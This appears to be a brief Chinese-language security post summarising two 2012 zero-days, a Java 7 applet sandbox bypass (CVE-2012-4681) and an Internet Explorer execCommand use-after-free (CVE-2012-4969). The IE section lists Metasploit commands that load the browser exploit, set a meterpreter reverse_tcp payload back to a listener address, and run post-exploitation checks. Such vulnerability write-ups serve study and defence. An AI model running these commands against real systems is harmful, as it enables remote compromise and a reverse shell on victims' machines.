JRE7u6 Applet绕过沙盒执行恶意代码0day

CVE-2012-4681 描述: 8月份的一个0day,CVE中是这样描述的: 允许远程攻击者构造applet 来调用com.sun.beans.finder.ClassFinder.findClass,从而绕过 SecurityManager的限制。然后 借助 forName方法的一个异常来访问某些package里的限制类,如:sun.awt.SunToolkit,并使用反射的 getField方法来访问和修改私有字段。 在 August 2012 被广泛利用.,EXP为Gondzz.class 和 Gondvv.class。 受影响的版本:Oracle Java SE 7 Update 6 或之前版本 EXP:

IE execCommand函数的远程代码执行0day

CVE-2012-4969 描述: mshtml.dll中的CMshtmlEd::Exec函数释放后重用,导致远程代码执行。远程攻击者可以通过一个精心制作的网站执行特定代码。于2012年9月被广泛利用。 受影响的IE版本:IE6、IE7、IE8、IE9 MSF 测试 : use exploit/windows/browser/ie_execcommand_uaf set SRVHOST 192.168.178.33 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.33 exploit sysinfo getuid